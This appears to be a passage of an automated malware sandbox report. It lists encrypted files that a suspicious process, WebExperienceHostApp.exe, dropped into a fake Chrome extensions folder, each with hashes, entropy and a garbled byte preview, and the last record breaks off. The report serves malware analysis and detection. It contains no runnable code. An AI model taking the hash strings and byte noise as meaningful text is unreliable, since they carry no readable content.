MD5:	EB7C720674B853F883C9D6C6325CF5C7
SHA1:	F04B971CC4D1C23BD47BFA771D212C4EB5AE3426
SHA-256:	C22A92D0A3B8B305B124B6972B98B2CD6B98FE4B1A7BA50A1C0E7AA423F46250
SHA-512:	D2CF31C0B7B8309641489AB9B38B6D5F2616F48844DAB66962806CA7F08407478F0A82C138DCD784EF962D8666F3829E0B43B64EC65879FC9E10F0BC3931BCFC
Malicious:	true
Preview:	O..!n./...;F.InU$....\..-..C..c.w...,..W..X_.u....M.7jH7...H....n>.\..#XI...b.4.n....7@..4.4..z'....Hq.W.........Y]e.o0.........7s.....zQ5.<..d...3...S.....`..g....&(}.MSH8J.......,$.......k.....<.).e.O^....3o.PshZ..eLa.S\.7G{.v..(L......=M...`j.;\.k...6...s..6..H.[.^P.R.$...;.#.......Np.....g>.r.%#3.G.a....gN\| ....Z.g2..1....K....Q...OVi..o....V.:...;......s.;.}..w...-.Z..>D5kr.e.{,.$:..1:.q.1K....X...u.i.3kK..../.............:A$.2.....p~......)..P ...S..x.`..D.?.x.a..0`{..E6T.>..K~.L0_ ...er..b..%Ct.X...?.~..M...d[[uq..+z.a.A....\|V<.w....m......u.../z....V......dJ.Y2.......;e.ZZ..?Kp.F4.-....._..R.'$.#.z........Q.(..-&x<.U(....mI.........i.ra.I8 ..J..#..(.+.S.......e9.F]h.........I.M....+c.?.L.j.'.!.n<..&802A...O.g..)....p#..D.PE ....cb....,.8..e.7.0.:......a....,.....n..F..3.e.~{..y8.f=.,.N..:.`3..Z..1.Y.....Y....'?X..Zd..H.p.."..f...4...;Oqf.\|u....>..4..+....P.kJ..$.;W..G....;',.........pW.q.v......U....+......;......N.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.22

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	34458
Entropy (8bit):	7.995065071026279
Encrypted:	true
SSDEEP:	768:RdgRHKthT1JBcaEZjGJ3yKoXaEnj/egD2L2RqTfb1:nQqD1oFC7oXa0agSLJb1
MD5:	B5099C89149E1DE924259D2E48288985
SHA1:	7040EA8D49957FA35E5C09AA432556530C0C1A6B
SHA-256:	BAF8E0ACDDFD9ED37F0445328F13CA1BD29525000747504CE0117C827B22A0E5
SHA-512:	A1BF06A87A2A722CE3BB440CFB47C00BAC5B59CBAA109A25C096754491853768628A567EB0D70C1E2201C38DA155BFAE6D9763B50EB2D2A876C6E5AD032E5FAC
Malicious:	true
Preview:	.nv.. .>...r[."MM..9.E.p..%..o...:...[.k...?b...}..n.....+.........(.,.}..r.@.C....~n..<.s..[-YR.........-.p".......].<.>.S. .dI.L....O.i0.....Y..Q5.35=C..}.Y...$.7;.?F.-s......)&.H..8I.\|...](6.MM+..IY.o..V<.X.p?...u...U..5.....,k+tg..1....J.8...@`................."...!?..XV.#....K..I.8.3.>..5.E.&;....8.G..r5.x..zB....i.o.\~....]cff..HO..y..,..;.2jrK..-.!..P..\|%.\|....D>/D...oKG.g...LH.k2HmNoV.......[M\|....7.=`NX...x...g...t..........Z1V..@....t...?j.d.kV...%r7..l.{.(...K...&CDD....%.......d.].i.`K]...."$2C"P.q..m....@....& .^:.y.j.k......,\.....4.Pt.....@.<.....e...j~:dCe.br.C.fEL......C.:%...x-pO.v..68&......cF.S.&J' .%.E..h..H...!q....j...rX... .f.<.&i.(...HH<..T.C.......HDP.ZQL.xP.....b..Y,.c.4..I8... S....\|:r'N..i;.. ...S...a...XB.VG.O.+......?..5.....?..5#...i.~....p.-k...;....;R.....rAI=..eG]...em-.f8.!.Y..1.B.}G...\|.%..N.u.i)...=.}...bc'6...Um.....\|s..N...=Q6.`.Fn.?.. .C!,...9..z..`.K.....Q.....)i. q....>.U\|./s^.....{.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.23

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	95125
Entropy (8bit):	7.998052073557218
Encrypted:	true
SSDEEP:	1536:TDYBzwP6dHbTllbs6r0S2baOVrDykk5D2jRJa/B1QI025:TDnPkH/Q6r0Sn6Wr5aNJc0w5
MD5:	13152C5FA12D4F1599956EF00675BC54
SHA1:	6143073A465946CCF6B7C0B7910936E009E8D702
SHA-256:	43111D74515006A80C5686D339CD9622D6B537F250340EDB46DF29F64027DA8B
SHA-512:	AB913537A38A8195F6C915719F2A845A68E3C51EB1171E2FB564AE5F87F10386D3AE4BAEA3B56D3B7E9A8A63525A23802F811D2AEB854484DAA645D642A987D7
Malicious:	true
Preview:	...N.].M.rr.2n.._.n...;...Z.."E..y.U,..x.E.:.8.r..i..+.?.!.....1.....c..V..!..._......^....V..=...^7..k....<..(.,...$.+....ED..-.[.LcV".T....>..4.9s6..)........-....(r...h.e9...U.2t..W.>.e..l..<z.y.\|;...>..{.h..R?6E.,....e.!?.j...l...o.F...}9....r.9.;....t.2.......C....."1.^#.].E.....M......6..K.h.....".~...Z.d..}...U..4..;y......-y.r&.h.......d.......L..Q.......!.P.6......:S.:.".a.s\aX-.6...B...........^A..q.p...)V....8XL..V....I...5Y.z..J..>.....G....)B.Aa.....v.u..R<.!.w_.I..../>...[>..J.?D..b]...!.YR.,..'Q...3B...Q.....`...^,4..{..U............&.........&Jl.h..[@"E...\..s..\|Q..l...1.6..s...4.g.....vp....J..I.1.R].^.w0,...c.m.x.h0..%..]8C0..>\.V.....F.C...10..T"...[x..h<............Zf.....z~...V...e.Fnx c..k.y&.....o.4E...\.$....?.<L.U.D...Y....0...9Lc.U?....nR".....T .I.W.f..h.4.Kl..p.Ag.h.I..4...<@.\\;w$W?e.n..........5......?...*.....f.S....%^w\........'&..m.......6...W......6...'.bG...X.y.`.e.)..5 .7..G..T..\.N...9.\MmO2$.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.24

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	31388
Entropy (8bit):	7.993553977949406
Encrypted:	true
SSDEEP:	768:iJLcWyPWoLfFA1Jf6Vi0NT7q9bzS4qEx2Rs+KE:imWyPVL2fixuq4qoID7
MD5:	B8393402C92EB5B566D316890AD1D19F
SHA1:	A922D2E8A2930CFBC98DA9D220E314015E6F3F5E
SHA-256:	E9EDF0887EA5CE8EFE4A9361559326C3D7ADF381E7F4C604FBE6E6064E2AED9C
SHA-512:	C2FB0E390843C27279B3B69A6AAB58AE9C8BD30D5019170C712C0310F59747DA0710EEB5A869918E0D0FE105E2DD79D1A1C968BCB733542AEFE9B8C2BA7DBE76
Malicious:	true
Preview:	...\|=R.....a...D.c..7.<..p.Y...y.`..@./.=..Sh....-BYP.5.(....8....C.r..B.v........3..8b.y....WZ......j.n2F.9..O$...K.x./R9N.b.G{.\!...=.).,.T6.....xz..@.P..j$....z.0..TYj....W..&.az#..3aZ{+...V.o.;3...$........D.....?>.M..72....4/./t.O.=.5V.l7...........,...6...W.S..^o`....9.e....l.}j...Q..o..D........+...!:..cO...g./. .~!a......?J@....f].%...f.q..d.R9.#.C....O.=...0...<..p.?d....v.....+M).....>.q...4...Jn@y......^v.u.aK...k...!m..s..T..w....[U+.......-....8.!..w;..I.M.I.A..A/.\|...........Fd(.c..r?J.........2...2e.I.t!VS.....R...m........b#.;/d.....L...0.......C ..,z..Uw..{;zT.z........e.Bo.'.."X.w..=.>....s...`-.:.P.A/..}..%}...wcp....0.-..[.T.v.t.v.......~Q......}.M.m.g!.&EQ....+lC...=...)..g.k{t...s..?.m..@).EX..."..k.q.q...g-.(..c..=.C}TUFwC...E.e,w....;.....5p..........(jT.....<..<.....\|.g..8.M.....B...r.hR.G..\|...0F.....[..C.z1...u.S.\V.&....)..J....VL&...iac.....X.ty.0..Y..(*".=O................\..D.v...H.....0a.#.....?.!n9a

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.25

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	72678
Entropy (8bit):	7.997134552088717
Encrypted:	true
SSDEEP:	1536:M35974nemnLM7WH6S46vXHTh7r69Are+cAzEbpCRMFkVW9ZctocVaizqJ:isn5nLcQ7PzdgocAzVMzmTLC
MD5:	F0ED5412A9CACBBCB5CFC09E306C49F0
SHA1:	B2EB294C19FF3104F938ADFC64742013DC9218C6
SHA-256:	41C08A34207748AC2E3877D27276F4DBA0404BFC76664E732887578538C6B026
SHA-512:	4C0FD918118B0445D8D8BC77D52C6D86FDD78312B0FBE476EE3EE604C4E9A432E28A9EB097CF56956E32712CA85628AF8D210B8067176531368EB746237FEE5B
Malicious:	true
Preview:	K..=....I........o..1...R..I..o......,.q..e..k..E.&H..6.dw3a....{.+12\..J.6z..n..c ...Z0..p....U..bTt.^f...".o.w......xX.w;Z...6.....P.8AI..]....n.(.PF.[B.G....}....kBZ....j..wF"+.....d.B..g".A...Ih....o((....(>.S)YD..%....M...t.b2.....].^....N.....{.R(\|.@Z,.5q.i.d.......r.... ...oYTv]a....3..o....sQ....#Gc.^..1nm.....N.<.'.`..y..?.....T..7..q....{..W.`D..(t.O....Y.2..#,...jS%..2....qNr..W...3..6...\|V.....y...kM8.v...<.Ko.U.h..v...o...L.]..[.wwF..vo.Q......i.S..U.Q...!.-.r&0...N.6^q..#..}..... ^R.1P\.I....ko.R.ad.Lr.E.....+.k&.....h...........)....Jy.'...V.)&d.... 9B....t..W......X............U.&...,.@b.~..u..,1..8.0.l...M>..Z ...........\|..j..X.....HOh`zZ......C.D....E..}\FB....!......j._..R........#.O.A..v8.m........ei.<.7*......D......!P.5.hA..,DI.v..dc.....f<.UC?......q...e.2..W..7..O...%...XgTXZ.+.....i[K..p^I.'?H.o9.JIl....."g..6.Y.%....&?O .W.......%.....+ C&..ZsSQP`.....&.(%...K9....3.K.XY.D.S.@s.i.\R7.O.#.Z$.ac.om.A..)...u.....

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.26

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	97479
Entropy (8bit):	7.997548337897213
Encrypted:	true
SSDEEP:	1536:NU17thO9VWnICXjqrSwuTdegZH4kAMzF3fFaUlwgLtz7s4gbNNGsKltm1+QFlY8F:NUFrvbjESdTogZnzFaYvs4WfGlU+QFlR
MD5:	802E029C20C38A8F328215569A431A4C
SHA1:	964942E05BAF1FD46AE49468C9E60A032EADB7D8
SHA-256:	6B01760D88F92A0E1808178FA67559B1BDA9E6AB0A42D41D3ECE874A371B18B4
SHA-512:	1D4BFB7F3AFC8318DE4449AEABC2F2B0BAE203DB9EFF30E8D8782D1E146E0375815373D5625488574981A76B45C5EBADAF1571E9FFCCA43A3EBB77FD4906C893
Malicious:	true
Preview:	0.......t.].K..b...x.Ow...{.._>....O.....N..v.rp>9.....k...6=._.>..c?.G.O..`s..r..._...{.f...L.....v.....l...S...C.....55..,........t.a...xD....\|...i..e...\|.&8../u...Zh...{.H...!..y..U.c(.e.w....t....;.AN.7#.8/....J.4...c..X.M...g0..g..1.1.....qF...._k].........f...[...7.;...W..[...}..\|..ig...B...8.j.............&r...x{...l.Q.S...p-.E.[.W..+~..x..(5..s1.@.......#RL...!..P..x..A.n.\|.......\|Z.......>.[...,..Z.\|....<.>.^NY...R4.P.%u.^76......ZIq..@SOb#wO...a....j.Z{....6;Hb6..o.\H.,i"X.........r...@....\..q[.&.)...K.N.UD\..%....."..T...I...g..R@f.'v...=..WNsY..}.Q..f....9Z..E......3.}#=.X#Xa..{.,mN."!....T;wQ.p.w...ud..%.I..<'...&.o.zf....R..GQ-...Vf......98..[~....=..A..4.#.3.........#]g.K...(n.A.c%..H.k.X._...-t.K.R......2/..OC.YUS.A/...\|.........TB........0a..kQ6...q.p.Z.O.....<O......si.=...+.......@..n.N[..6,}.....R5...`..g...>..LRL...5.~...-".z.ZH..o.5+.q...$...fUF.I.....{.9n9......2.G./.... nZ...\|b.&.._.M.RO?".......x

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.27

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	37155
Entropy (8bit):	7.995000093480915
Encrypted:	true
SSDEEP:	768:F9Wl+QmDeG6AYPOUwVnHv8pD4cHWUhSiQYxPb8fhg:75QmDefAYPPAP8p7BMZYxPehg
MD5:	A2B495E556C29583A5457FDD5056D0F1
SHA1:	B2F34D095B9299E4DF4075686CFF9F6C9FF8F5E2
SHA-256:	228FE92C0C44A266956C9D5F603F3B94B458272D4D5476CE8D25762CA27556CB
SHA-512:	132F82CD3EEACE46872F71074A795363D8C3CA7F6CD0AC3DB78651D91C34AE475D1A7D43B0BF9BE73002A35AA80158C59201E517B1F326B1666EED3578981CA4
Malicious:	true
Preview:	q'.q.GF...x..-5ZG.W.a........C.M....?.A..%d..u.]... O3.%d..so..k.g..O....Z..l...&..7..b...rP.< >k..)..'.C2..zd....._.......[t+`...+.....z.WpU..dN.._f.;di:U.....E1...B.....Q. ..{..fbk.0V....\|.zS...f......i..G_.......%...T>\|..I.+...vj.o.f.?...2...$.....f....h.Z.G.8.@.1..........$k.........{q}N.XK..7.W...........%..=...!.^#.s..@@q.I...L... ..L...H..vr.B'.....[.....Nk./j_a ......\|Z....-I...j+G..e..r+?....\RM.XCv.......BQ..."VO]j.`X.7...i..L.Q.>...o.u.....T......2.7.B..xs.....x8.`.{..t.-....82.a'A......3T.V...C...-\.Gl7.....lC......w.%...TJ.v{M.n....^l6.../..@L.Ys..5.s..Z...\..4...RBG./.K...b.<(..(v.l.cIl.tp%.pB.l....I...$..fI..bu...c...h.[.....m.../1a.[?....Eq.......#.....~8...T.<P.).\|.v.8.\|....hoV...Xpy^..4...>..A......0...~\.........!.....q.l....Kf1,-P...T\|.J6.g,k.HO..+^.. nD]k{.\|...rt.}.<>u.........s.}W.].....(B.TF.~Y...(...u......G...3.X'$:).h3...0Bb.YP...'r..DG$...o. ..[...F.S...Bc.~.7....X.....e.......w.}=wc!Bm..\|..}\^.......N.........:..\|.:....K!

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.28

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	85182
Entropy (8bit):	7.997870667848278
Encrypted:	true
SSDEEP:	1536:rFy561FQAL32O4bOPldT13OssxHmwdx8T3ET6OVa6Z:pC61/32ObPll1ess138TyV
MD5:	458232535F5370AEF3143BE37A8BABDA
SHA1:	4C0DDDACA13494FFCF0372911880B9A76D9BD1F8
SHA-256:	BEB29C72B92B1C7693890BB21C11366E6F72DC0AAD8EE9A62AA7532AB7D6CB8A
SHA-512:	B8F300F30F44E9B204AE77C0A00468B8C0A76CA381ACA5C2341998017BCDDAF1020426977915A85DF79B119B9F18C0AA23AC11C75364DC6FF6BE0D3E938662D1
Malicious:	true
Preview:	....!S......\|p...B)q.(...e..:"I...3.....(P.0p.j.[...v/<E`=....8......u.N.\..w.j.0.m.Rg......7^P.Q+......'N.Oi.,..@..[.+.....E.].v.\r.sa..p..\|0..;...}9..%....oY...HN.z...t.x...)..iJ...nz......Eu-..a..Kd.?p......U3....o2.~.q...jS.-.......0V.K3.G.{..k[.1x...u{.Q.E...,?U......@x@..s.... #D....L./.L.2...AS.^P&Pa.Z.L(.'N.Ug..4..;....g.o....]s.vWl7.;r9'R]..,.EU..a.....@.T.gD,.Ha7...UT.gd..D..E?..9......Wi.=.=/...d...5.F/V....0.D..m=H$..._......S....=..p./.L).&..b..t..l..F(6..X.=n\|.c..q.O.h..+.&vn.............:..fm.:.i%6...k..4............2..B`s01...U...2,.y..PD...E...^.0.>.I...I...."X..n...+.........Qn}T.z@.6...<.1...`o...R...u..\|& ....~.H..q#..m..u....P..}.%...h.@o.&.u..^..<..@...]S..Y......aW....eH3.n[...y..#.E."N.$...M.Qd.Wl~9.....^a......y..........5.V.LR\....y@.q.....'.........cw<0...;...T..T1..]\|.f....x./T..fh.a..D.a.g:..2......).Y.d.(.Y..EW...ZR$.Z........B.._.0#....r.7._..J.._%h./...}.T.....H.e.....y>.\.j.J........<....._.W....O..rN...+.....

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.29

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	28902
Entropy (8bit):	7.993241166696542
Encrypted:	true
SSDEEP:	768:nPJV7SIKkXfYDKe4n4Uf98Upf6oBiEN4CmZu/2nvLxIH:nPJSkXfULUfneEaCmZznzxIH
MD5:	5D9BB698C5A4761DD137044A3BB372BE
SHA1:	1652F8FEFD829B909937B076D2A6742A9F34D1FE
SHA-256:	5967CFE92B9473758E8AE11F1838E948F3EF428727373A991680269DEB8AE15F
SHA-512:	27EB7E41EAD84E537CD072EE15675C7754CBF0B33335046039EB41A02EBDC42EB98510307E57ACE78ED1A3105880AEC91F939DC25A4BD0600B1905F27B085CBD
Malicious:	true
Preview:	......{.gB...R8RW..]..RH,1XQ..T.OJ.CMp............"Ux.{...4....i.)~e.H..3....k.5.;`..{..u..9..V.".O.!..7..$....o.a....&lr.;.... ...z../.v.....2rwS.k{.\.2t..W....6.h_'.....j9.........q.&...WB`.d./..t+?.\|..V...P.......^.F.PF.=.x2m....e.'.w.o...?...O=.....O.....s.).k......E(..v\.U.@......)....Z..F.Pi..c..O...p-.I\|.[.ZJ...x.w....p^q..u-.&.."..>:.)o.C..yK?.....1........k.qO(&........I...x.f....m....&.F.h#....qZ... m.[..;.d..iUD.d.D.\g.\....kXU.>..W..<9.H.?....w)..F..$..&F2cBCTR.....q........$V....t.D.=..LO..pj.b@....?.......a.......5;.....2..O.h.zU.(....x...I....Nj.....&.Dt....W...uBU..X.f=z.f~.[usKw.H....H.x.6B]...Z''3.....%-...;..j...Z.]..s...~....C..Lw....^.XF..@...vN...\..H5j.5....D.....%:...``.L..1.7+..EyI.da.<....w0..[T.......e.i..W.@..i..0......4..T..!`$..]..L...U.........@'Ac.:.$&..y..=.{t..jI.......p.........`!".D`...:i5'QD....?k+EN$........[..w?..._{..5..3.{u.3pY.<t.H1.a]...H..F.'..C._..x....Ho.^u....^.....8.{..u.x.Ap@-n;X

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.3

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	90063
Entropy (8bit):	7.997978048003362
Encrypted:	true
SSDEEP:	1536:P/y1Fav6puOSbb2ZPWGaqysLtriHJgbazKp12K2nTDFZi6Z:Xy6v5OSbaZPWGaqTLFegm01g1E6Z
MD5:	4752F4947AC9E08217CB1EEA6E9A1373
SHA1:	028B187AE131E220C73892945BBD47A18DFF75A6
SHA-256:	1978D6F70C6DCF9067D384C2AD2E76B6ACC25E9EA187300B311BF18AD495C305
SHA-512:	ED5E898E56421DE0CA90286A386DF89A83BB4A50CE414AD196D0722D0668B2B2099597F56651CEE22703EAFC8E509EC8858B12494D6CFA1AEC804259088F8B5F
Malicious:	true
Preview:	..+.g.k....?..7m.u..1...(e...}._M.5.6..;....%.D......f.n..b+...?....._..o..?.J".d;}.I^...G.Eul...U...R&7.....B..mW.pT=....k...ZX.)..U.O.f..u...B..`....-;....{6.qv....U.lB..Qy.9..,.\|A...<o$...9.D.7u..q?..@.......{...p^..}.4..Y.%(..wo:`W.j..#.Aox....X..@..N.R7.p ......7mr+......!.....{'f....l.....G...k0,8.....AW.(.E..&.....</...{.M..-..G...3..f.....P..Yv....I".qjT..Md.1(..Y.J>.2........?l...2...)H.Y......3R...R#.i^..%..g8.....u.W...lC..nZ.4.5{S.v...!".....z....}....i....Vl.H...R.J..(W....6.X.$f.#.~.2..{.!..=..J..s....0.E(}.i..Y..QL..O.Q.,..L.,a...?....d...)(/.dYz.JA...;......\.Yw..G/.8\|K}......S...&.?.#M..3...LhBZ?.7..y.:s/U..-ws.....A.B.aVH.hB....~..8..x'X[.Rr6X<}]....._ ...2.A..8..)_J.....n.z..'.R.....\.4...{.p..&....S..0.^zY.M..o..yr..S0.....Z.....".^.a.>.xJ...[.8;(.jl@..`\I..H..r."M.c.S.e...!.R..Q.4.V&@..O\|uk}..,)[..E..C.A..1@c...P...D....FD.....M}[q....h.&.zY.6v......w..Ub...F_S4t.....aa..j.\|%....K...aN......9..!.#....i2.(_..MkZBG.j..

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.30

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	85341
Entropy (8bit):	7.997527809534056
Encrypted:	true
SSDEEP:	1536:Yuz802suckUPriZAaueKwpR5vaSySfuV5uLC9S1Ak9n/eV2G5P++JbFCRRqHjLML:zJVxuAauehpDvagfuXsC9Ul2V2G5PjFK
MD5:	FC554A9ED730ECDC0FDAAFD29FE56255
SHA1:	59E7C072A6820E9797B89F8F89A97E452A2025CF
SHA-256:	26B4DBD9AE8A610837D0D73F2E34E22213724A4637FBE6EB861141A1B2DBE8FB
SHA-512:	F687A66CD2DD13502FE6EDCBB2AEEDD8A088F23A38B58301A7AB93F32EF704A8E69357D17825A66E843918A4EF7536A11406B3ED2FCA07FE89C073F4A0579A9A
Malicious:	true
Preview:	<...m....pS...v....K.?.......N.fD`c.'..si....Y......._0/....^...d.4s<..S.W....!7B$...SS(U.E.p..\|..&~)..9.]..... t..mt5V."...vAw..I.....b.....9...I...[.>V..:b....\|~X.>g....qZ..8O......a.Z>......fF.N.}...ST8..p~...@.#f^/.\RU.Q...3..~Sf..J.{5..S.....+......_......(....~?.Qsj..--".j....oP..3@..>$.(.%U.C._'.D...'Cc.y.N\.X..!..q....\...4...3...H....5[.].D....'@.....m...S.=..j.....A.<..k}.YDib\9}..'..a..<\|.:RG.v.'....h.....V........2.[.....'.....E.c...1u..e.4...e)^...q....M.....^...%..L.b7I..-#....d.Sr,.LM.N....kb...s).=_.x.P.'.i.....{_...9...[o4.!.Z.f9.}.\|... c..............J.?.s6.=...T.6.!;.i.,.&...P......N...,.....k6....._.Iy....h3\|....u..C......'_.~..o$vC......f~L.W..8.fa.}.DY..Q...c+.3&c.....v....3.....tb...<.D....!.>.Z.l...6...+.sQ.U.._..m......:.kB.=.../.Q.......]...\...H...,....9\.%.."...:.."...2.....)m&s's....)m6a.z...W....y.t.'.f.A.v..).......v........bqzv.B......rA%p...X...b']y\|.}.-t.s....'.q.{7..-RnV..\|...?.Wh$.J.y...k.7

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.31

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	26428
Entropy (8bit):	7.993304138733814
Encrypted:	true
SSDEEP:	768:qL4N2ZXJNi057IVUHqM/Y2gIOlSeGQCRB82A/9:qdNJXqUHqM/1R8J/9
MD5:	FD11EEE06911152EF148D16414FE4BCB
SHA1:	9040DC2979125A9BF9A707C12814EC1881A314B8
SHA-256:	21FBD87F2D36DDEB97147F07C7C8F7935D073C3FD2ABB6FEF68E7C2B9953D075
SHA-512:	CD00380D7B4293599D4927ED7534ED29116C7CE6DAF61B4678FBAC31C488A9D14C907E0BB50008E458759AB99BAA0ED63C2704494059F8182FA4303CE53A33AF
Malicious:	true
Preview:	...>....6..".k"[..$.+~...\gQ.w$M..Z=.<.7)H......$}z\$;..J.RXt./..4.....6.....V..R....\...#.n}.z...)...[.f..luV....z..'..~......<..C..t...y......M.q.8...._.....3/7.`[.c.P.Dn.\..3...T`.ey.4..Y..=..:.,.e@...q.S8..M,......p...bN..@o..#..n.X..@..t9.\d.W....QE..y!bS.!j.........n....9w...?H.....x.p.,....K21...G.,....O....Q!.DB...)...G....'Z..5j.A.O...6Z.=....../.k`...D...p.......r.KU .A_...[sc...)..nl.l...2....#....".2.(8...d.w6.0.Z...#q,Am..5.l1....y.J5Z.Sy.....@T./.8........O..B.....;.Tl.C.6.JV..4...r\|^[....8@........4.].$J..W&X@.\|..K..2F.[S.X#..E.}..v?..^.w..El..#5..*5c..=.._....oc?UC....`..R.....\|.4...kn...R.B.....C..k.2...$;.....J...!#5^..F.......U..'.....k.'E./...Hs..^Q......o.;%....<...........i.;..D.o,?......Dv.=.L.uW=...K.T./V....28&.X5...K..w.4....m3..H..........T..to).O'..yr1....~.w.P&:Q.H....D..A....P-.x..>{[........;.o..)8K.q=y.4..NN0..C..\.Z.T....{.'...\|."\.ra..c..n..~......... ..}....I$u..g...H..@.&...(^.........K....#..L..3...2m.r...m

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.32

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	100408
Entropy (8bit):	7.998283449503362
Encrypted:	true
SSDEEP:	3072:Qcq8QiChijKNpxN9PW2ALVQeVUbQDwkdXs:QcqfrGs9+BLfVkCdXs
MD5:	C761409D18F6AD93E7744465D2F63D11
SHA1:	32DDDED664346EC04B7C9F8BFE8D1209F96E27EC
SHA-256:	D25418CB3C0E9E3ABA3A2CDD74E70046481D8E8EA9C57785EAAF7483AC7F30F6
SHA-512:	9D418AB7149A76F9660D77C801F5CE148480BFF19EBB8DDCA0F685595763B4DDC2DA5DAF19D9472EE5F0EA3B52740E0E1D18A92B5019EE85381BE3237256064B
Malicious:	true
Preview:	.....z..Jw.......>'>.9.T[W.W...L.L.........dx=.2..I..=...h.m..ZH....}.p..>.......-g0...e4..%^...4d.:.../.2..V......1{..K..=q@"TU?...P:....(....U........f.2d[..h.Y8.Kl..b.)....xb........A...t......lwT..6].@...`....r-.@.$:.Ei0+....y2Y0..VX$.,o.q(...#X..1.SN..5..........G.O._...~.e..7. #..h...W...\|.R....c..s.x.T..<.).....c+j.w.._.j7..x3.`.S8...U...\|.`z.........;.jX...CM.fooL...Y.mK2'9....a?.z<g.....,W..Z......i2O.?<..\.dS....CO...z7L.B....W...b.2j,.0....aH...)Go.6..0I].8*9<.......-p...t...F.y~q.Au<w.........6d...^VE.9...>.9.9}..M[h.]-.....#C..V..~.FP..5.......II.].i>W.9e~..rOZw]. ......1r.R....E...!...`.....Y...t(.L...D.V.f.k..]\|...0..o`7.-..kl>..t....e<..M.hF...a.$..c.e.SH..../n#e..Y....r...e.hx4...%../{n.`..&J.....$...M.....GN..Z>&..vg......Up3P....q7.]D .h.~@...wK.5.L.Q.M...N#.$8..pr.qGe.....g...d..s..{i....B.N.w..Sx@..,.?N...$HND.j.m.}.U0@..........PEx....f>.\$..<./.}..nE..........-`SR.?.T5.i,.1[sm..}...............4.M-.N...kjj\|.0f.....{

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.33

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	40474
Entropy (8bit):	7.995172259437193
Encrypted:	true
SSDEEP:	768:scW5l/ci9zp5l6W4nCTSNJmbXrTwjiC/BjtPM0N9MAUynixMPBqVWURk:VWL0IjFOObwji0BhxNefo3Pkwck
MD5:	BF23D68C10690EF8B07A8334C20FDBA2
SHA1:	2D0A319C3978349BAC3AF363CA72E9F0CA5AB2B8
SHA-256:	2491C432A3D5ABC0BE492C657B3A74F8A7A2F75BAF3596D1B61373C2614E8611
SHA-512:	936D9FF6779F99CAF536C19217A898666A6087376373575A02254A7774DF821ACD8B3EAD870EF5C8BB84A32ABAC7977BA4CD960D1744BA4B4109211CD3F61C31
Malicious:	true
Preview:	.jgeD..~.......!>I..u...,.y....D.;...m..}...=....u..Z...S.V..w.......7.:..DLy.8N....q.........g.S{........U.]X,.6#/V..[...A...f6..X..._..5..LX..._P.KF...S9d7......].....l.....M.N...h.7...X.0.\..Kh.:.?...o8e.$.f...DQ..x.."f8.k{.n.^...'.Bo..), ..5.O....v.83........[\|/..}...w]...B..l+......h..=..1s>.GA...V.{aBy.xS.y....@..2{..,...`....h.......w..}`z.X#.q..Jn.Y$3..]4.!..7.b.>.Exv..o.d.^..#.k..`..}.#u.'.tR..w.U&%k.?.w2't.(....u0.H.......y9....7.. `.4.7.E#....,-dmg.:..3....Or...+..G..sxqa...zqf_}[^.)..).d.,FL.q#.^....k.'...nZ. .)\|?x......#....[.p.;......rwR..3.......T].../../u.....j7..U........c;D[Zh.I..Wa..<..B.....$..b...0......6.Z...7.....ma.]..Wl...k...2.v.......IH_.\|=.lB"3......."M..zMB.Z....yP...}3z-\j..........U........1.\.J.&....$..(U.j).&Y.N..?.....=..3Y..~...g..[.6.$.[.....\|....l6.I\..s...f..$.Z..km4v,}...u{.. ."......r.k....W.%N....M.q.....?..p...&...\.......a.....=-.T.*.C...3.5.:..$.jT.`.xS........kC`.2e.X.u....X......0.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.34

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	98741
Entropy (8bit):	7.998243054332217
Encrypted:	true
SSDEEP:	1536:oX3fRSJ+xEsiYjMjkiv2/ancWq6xFHQByrkFbMG+XUDwer4BQmxmFRq+aR:oXvx8Yjniv2/MqS7oFwGbDw/Bz
MD5:	79958A2AA153BE7B553CC2D96CD06D04
SHA1:	9EFF9E58E82B0DFE8E20807539A42D8170D92FDD
